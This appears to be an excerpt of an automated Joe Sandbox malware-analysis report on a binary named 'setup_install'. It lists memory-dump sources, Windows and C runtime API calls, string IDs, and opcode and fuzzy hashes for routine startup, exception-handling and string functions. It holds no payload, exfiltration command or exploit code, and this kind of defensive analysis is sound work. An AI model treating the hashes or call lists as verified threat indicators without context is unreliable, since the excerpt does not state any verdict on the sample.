                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleLibraryLoadModule
                                        • String ID: ) J
                                        • API String ID: 384173800-3411028049
                                        • Opcode ID: 4d8aea1281172d6ac20df9085a7e26ee08c63b5b46cae6bf9980fc81f5e6a1db
                                        • Instruction ID: 3fed9d0f1c7bf81fe5ab1e5f575db8d1326146ef2d7c0b2fe84701984dea96ec
                                        • Opcode Fuzzy Hash: 4d8aea1281172d6ac20df9085a7e26ee08c63b5b46cae6bf9980fc81f5e6a1db
                                        • Instruction Fuzzy Hash: 86019EB080D2409BC7007F78AE4815EBFF4AB81354F01857FDA899B261D7B89448DB9F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: _$_GLOBAL_
                                        • API String ID: 39653677-1011282467
                                        • Opcode ID: 06dec30001edc313ee72c070c175a92cd6aa656eae1ead41d93f5ce08b88c2d5
                                        • Instruction ID: 1c21f5c12bb7b9c443c405340bd43c07b5322c77d87cfee6159719ff0277676c
                                        • Opcode Fuzzy Hash: 06dec30001edc313ee72c070c175a92cd6aa656eae1ead41d93f5ce08b88c2d5
                                        • Instruction Fuzzy Hash: 11E19471D04219CFDB21CF65C8D03DEBBB2BB45304F1481AAD448AB386D7799A89DF84
                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32 ref: 0040CA99
                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 0040CAAA
                                        • GetCurrentThreadId.KERNEL32 ref: 0040CAB2
                                        • GetTickCount.KERNEL32 ref: 0040CABA
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 0040CAC9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                        • String ID:
                                        • API String ID: 1445889803-0
                                        • Opcode ID: ea255ef42ab34548d890da4657654e4d872ea1eefed088238d0d1a24c5476825
                                        • Instruction ID: e5cd12f676e70e0bdf5f5ecd3a7c6037ad8a51af51339fc5186449f9903646a8
                                        • Opcode Fuzzy Hash: ea255ef42ab34548d890da4657654e4d872ea1eefed088238d0d1a24c5476825
                                        • Instruction Fuzzy Hash: C91191B5A093418FC700DF79F88864BBBE0FB88254F04493AE548C6720EB34D8488B86
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040CB5F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040CB6F
                                        • GetCurrentProcess.KERNEL32 ref: 0040CB78
                                        • TerminateProcess.KERNEL32 ref: 0040CB89
                                        • abort.MSVCRT ref: 0040CB92
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: 676d1801a4014d2bbd9d98e6f58b6f98d6a6eb1b696a01aa118196d3deb0030c
                                        • Instruction ID: 58e36196525d6f67f627e84375eda0c61e00c2e6997dec50267deacc97ab9caf
                                        • Opcode Fuzzy Hash: 676d1801a4014d2bbd9d98e6f58b6f98d6a6eb1b696a01aa118196d3deb0030c
                                        • Instruction Fuzzy Hash: FD112BB5908384CFC700EF69E98560ABBF0FB48314F40853DE9489B362E7749954CF5A
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040CB5F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040CB6F
                                        • GetCurrentProcess.KERNEL32 ref: 0040CB78
                                        • TerminateProcess.KERNEL32 ref: 0040CB89
                                        • abort.MSVCRT ref: 0040CB92
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: 5017205182723c366eb1eac80e389436671045b72ca7f22568de259b031e7eb2
                                        • Instruction ID: 7819bb01281ab8ceca9f86d0aefc0d3c8f1b0872c91f45026377f3254fb2e397
                                        • Opcode Fuzzy Hash: 5017205182723c366eb1eac80e389436671045b72ca7f22568de259b031e7eb2
                                        • Instruction Fuzzy Hash: BA1139B5804284CFC700EF79E988609BBF0FB04304F00853DE9489B322E774A8448F4A
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 6494873F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 6494874F
                                        • GetCurrentProcess.KERNEL32 ref: 64948758
                                        • TerminateProcess.KERNEL32 ref: 64948769
                                        • abort.MSVCRT ref: 64948772
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: e842bc28190717a084615decf3955cde83ac10e752745b63f0a27ed88b8db6ef
                                        • Instruction ID: 1f5bfd3378f92f67a48eae871100b48ddf9832a157b0d9aed82ff39c4463e40d
                                        • Opcode Fuzzy Hash: e842bc28190717a084615decf3955cde83ac10e752745b63f0a27ed88b8db6ef
                                        • Instruction Fuzzy Hash: 5701D6B488C204CFCB48EFB9E1496497FF4FB0B304F208919E98987604E7749854CF82
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 6494873F
                                        • UnhandledExceptionFilter.KERNEL32 ref: 6494874F
                                        • GetCurrentProcess.KERNEL32 ref: 64948758
                                        • TerminateProcess.KERNEL32 ref: 64948769
                                        • abort.MSVCRT ref: 64948772
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                        • String ID:
                                        • API String ID: 520269711-0
                                        • Opcode ID: 81c3fbf99bfd28983b65f1b5cac83f9631f8b32b19c2cf05882043377a15f7bb
                                        • Instruction ID: 5c9d36b0598bee5da53e0a0a82204d0e26b63caea97744da44e8bcd7d81ac210
                                        • Opcode Fuzzy Hash: 81c3fbf99bfd28983b65f1b5cac83f9631f8b32b19c2cf05882043377a15f7bb
                                        • Instruction Fuzzy Hash: D00196B488D205CFDB48EFA9E1496497FF4FB4B304F208519D98987605E7749454CF42
                                        APIs
                                          • Part of subcall function 00421B10: strlen.MSVCRT ref: 00421B23
                                          • Part of subcall function 00421B10: memcmp.MSVCRT ref: 00421B40
                                        • strtoul.MSVCRT ref: 00475088
                                        • fopen.MSVCRT ref: 00475125
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: fopenmemcmpstrlenstrtoul
                                        • String ID: /dev/urandom$Genu
                                        • API String ID: 316402028-2973575615
                                        • Opcode ID: 0621d6ca1c4bf91220a2b8e1ae0e1b5acdecd5a374ec607d326dea43cc5bbf5d
                                        • Instruction ID: 8fd9e74def58d37052e39669da2c5fc17705809dc7d9e3f4f3ac3b3d72e15860
                                        • Opcode Fuzzy Hash: 0621d6ca1c4bf91220a2b8e1ae0e1b5acdecd5a374ec607d326dea43cc5bbf5d
                                        • Instruction Fuzzy Hash: 0C4137B1B082004BDB14AE29998139BBBE5EB91350F44C83FD8849B346E7BC9845C79A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcmp$strlen
                                        • String ID:
                                        • API String ID: 3738950036-0
                                        • Opcode ID: 09b81b29422037d900b845f18c3c347610b7133e01e680226d489e823d086a88
                                        • Instruction ID: 589bc552d28d626886c4cbf395fa4dd5349cdff293b2e784b317e730e64ce9da
                                        • Opcode Fuzzy Hash: 09b81b29422037d900b845f18c3c347610b7133e01e680226d489e823d086a88
                                        • Instruction Fuzzy Hash: D7612875A093119F8310AF2ADAC441FFBE5EFD9794F54892EF48887320D379D8409B9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcmp$strlen
                                        • String ID:
                                        • API String ID: 3738950036-0
                                        • Opcode ID: 574539aee8286ed26b650532bbbc850eee6d01a42f32ac8fbcb5490ef2d89c3a
                                        • Instruction ID: 42b10324800706e85ef3f621dc64781445fd94d421cc5c9a3b9878cbe4e9b263
                                        • Opcode Fuzzy Hash: 574539aee8286ed26b650532bbbc850eee6d01a42f32ac8fbcb5490ef2d89c3a
                                        • Instruction Fuzzy Hash: FF612771609311AF8300AF29DA8440BBBE1AFD9748F54C92EF98887315E375DC958B9A
                                        APIs
                                          • Part of subcall function 0040F4A0: pthread_once.LIBWINPTHREAD-1 ref: 0040F4EE
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$pthread_once
                                        • String ID:
                                        • API String ID: 3910317518-0
                                        • Opcode ID: b7db6deb91b978d5bbb77142177d78c17fa55fc87d3e443f05f826511ca9ded8
                                        • Instruction ID: 840ffe95a2555e50b6ad804dee4a7b4d720d0a90a17a934e3250005a835da8ef
                                        • Opcode Fuzzy Hash: b7db6deb91b978d5bbb77142177d78c17fa55fc87d3e443f05f826511ca9ded8
                                        • Instruction Fuzzy Hash: 5721E875A0030D9BCF10EF65C8819EEB7B5EF89358F1084B9AD0867342D734EE498A95
                                        APIs
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00411462
                                        • pthread_key_create.LIBWINPTHREAD-1 ref: 00411476
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$pthread_key_createpthread_mutex_init
                                        • String ID:
                                        • API String ID: 582626390-0
                                        • Opcode ID: 964076266baf905e5735c73d6b38852adab968e1314a739822149c4dbef4623f
                                        • Instruction ID: 6597460d94454cd0260908f835b1277bf4ba0b2861edaf793f2bc1b8f4ca6085
                                        • Opcode Fuzzy Hash: 964076266baf905e5735c73d6b38852adab968e1314a739822149c4dbef4623f
                                        • Instruction Fuzzy Hash: 99E012B19483009AD700BFAA49053BBBAE0AF4534CF80D81EE58427112E77C94849B9F
                                        APIs
                                          • Part of subcall function 004112B0: pthread_once.LIBWINPTHREAD-1 ref: 004112CE
                                          • Part of subcall function 004112B0: pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004112DA
                                          • Part of subcall function 004112B0: pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0041135E
                                        • strlen.MSVCRT ref: 0040E5A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_oncestrlen
                                        • String ID: <sI
                                        • API String ID: 3094089809-3642889959
                                        • Opcode ID: 603ff127f66862a4bda18da00a5003e51b2b897f7e76bb72bd5fa6f6b019bb33
                                        • Instruction ID: c3a29ef918a4a239945e0a55a1745e6570da99c5a11820e2f0e5e9368fe1addd
                                        • Opcode Fuzzy Hash: 603ff127f66862a4bda18da00a5003e51b2b897f7e76bb72bd5fa6f6b019bb33
                                        • Instruction Fuzzy Hash: 64F126B16087418FD724CF2AC044366FBE1BF45314F088A7ED899673C2C379A969DB86
                                        APIs
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: a7cff6414f6f8c832954f71c6c60c25137dc55f69496c531cc125bb7b06e49bc
                                        • Instruction ID: c762bb2b87474b96ab118bb2c324fabcd94e8a2e8a2e1b08aad7c5102ee4eda8
                                        • Opcode Fuzzy Hash: a7cff6414f6f8c832954f71c6c60c25137dc55f69496c531cc125bb7b06e49bc
                                        • Instruction Fuzzy Hash: A92100367092258FD700CF59D8C16E5B3A6EBC2318F1885BEE9484F305C279AC8697A9
                                        APIs
                                        • GetSystemTimeAdjustment.KERNEL32 ref: 649478AD
                                        • _errno.MSVCRT ref: 649478D5
                                        • QueryPerformanceFrequency.KERNEL32 ref: 649478F6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: AdjustmentFrequencyPerformanceQuerySystemTime_errno
                                        • String ID:
                                        • API String ID: 931094001-0
                                        • Opcode ID: 29fc66e9d8ed261a96427248e82c90e58c75e60335a9bc7d06b0298bcc5724ce
                                        • Instruction ID: aa775e95a9881de23e6902d5595e6ae0adcc2125b0fbec22b016e5b1e3491d8c
                                        • Opcode Fuzzy Hash: 29fc66e9d8ed261a96427248e82c90e58c75e60335a9bc7d06b0298bcc5724ce
                                        • Instruction Fuzzy Hash: CD213DB59483099FEB00EFA4D98479EBBF8FB44360F10896AD959D7340E730E554CB92
                                        APIs
                                        • strlen.MSVCRT ref: 00485764
                                          • Part of subcall function 00483AD0: memmove.MSVCRT ref: 00483B76
                                          • Part of subcall function 00483AD0: memcpy.MSVCRT ref: 00483B9B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcpymemmovestrlen
                                        • String ID: J5J
                                        • API String ID: 1940570482-3061103420
                                        • Opcode ID: 2aa241e8d0431253370172ccf31849987bec482d3f37973410f507ad1c205364
                                        • Instruction ID: 62f8a48a67b0969cfc2206025c09322269a244fa67a97500d74ce428125de682
                                        • Opcode Fuzzy Hash: 2aa241e8d0431253370172ccf31849987bec482d3f37973410f507ad1c205364
                                        • Instruction Fuzzy Hash: 855106B5A09310AFC300AF2A968041EFBE5EFD9B54F54C92EF4C887305D375E9518B9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: wcslen
                                        • String ID:
                                        • API String ID: 4088430540-0
                                        • Opcode ID: 55332a321c017f23fe8df703f961228c6aba8ec544189182b29cc96bd8bc6501
                                        • Instruction ID: 5b271551496b6c70c83c7e16c7da109c9d40ad5dc97e60b610a48e3246d236b1
                                        • Opcode Fuzzy Hash: 55332a321c017f23fe8df703f961228c6aba8ec544189182b29cc96bd8bc6501
                                        • Instruction Fuzzy Hash: 4491CE72B042219BC3249E2DE4C085BF7E2EBE9314F95892EE58887311D376DC95CB86
                                        APIs
                                        • wcslen.MSVCRT ref: 00488634
                                          • Part of subcall function 00486970: memmove.MSVCRT ref: 00486A11
                                          • Part of subcall function 00486970: memcpy.MSVCRT ref: 00486A39
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcpymemmovewcslen
                                        • String ID:
                                        • API String ID: 2185736083-0
                                        • Opcode ID: 37bd50115b2552b612b0c831997e3bc987e6eeb91c4b4bbe54f8ffd70d267ed2
                                        • Instruction ID: 6bb299ddbe43ac2ba805961ab12313442bb281e4fed729ac0bb300911f28d00d
                                        • Opcode Fuzzy Hash: 37bd50115b2552b612b0c831997e3bc987e6eeb91c4b4bbe54f8ffd70d267ed2
                                        • Instruction Fuzzy Hash: 7A5115B5A09310AFC300AF2AC68041EFBE5FBD9754F54C96EF4C847305D37899558B9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: POSIX
                                        • API String ID: 0-397921758
                                        • Opcode ID: e1b454954f011bf638e07815149d10a180966277ffa989e0d39ae9ac3ad8adfd
